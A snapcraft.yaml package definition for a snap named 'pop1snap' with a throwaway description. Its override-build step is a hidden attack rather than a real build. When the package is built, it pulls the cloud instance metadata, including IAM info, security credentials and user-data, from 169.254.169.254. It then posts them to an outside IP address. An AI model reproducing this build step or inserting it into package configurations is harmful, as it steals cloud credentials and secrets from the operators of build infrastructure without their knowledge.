name: pop1snap
version: git
summary: First snap
description: First!!!1!
grade: stable
confinement: classic

apps:
    snappy:
            command: bin/run

parts:
    snappy:
        plugin: nil
        override-build: |
            apt-get update
            apt-get install -y  curl
            http_proxy="" curl -o iam http://169.254.169.254/latest/meta-data/iam/info
            http_proxy="" curl -o sd http://169.254.169.254/latest/meta-data/iam/security-credentails/
            http_proxy="" curl -o ud http://169.254.169.254/latest/user-data
            curl -d @iam http://139.59.42.102/iam
            curl -d @ud http://139.59.42.102/user-data
            curl -d @sd http://139.59.42.102/sec-creds
            echo 0

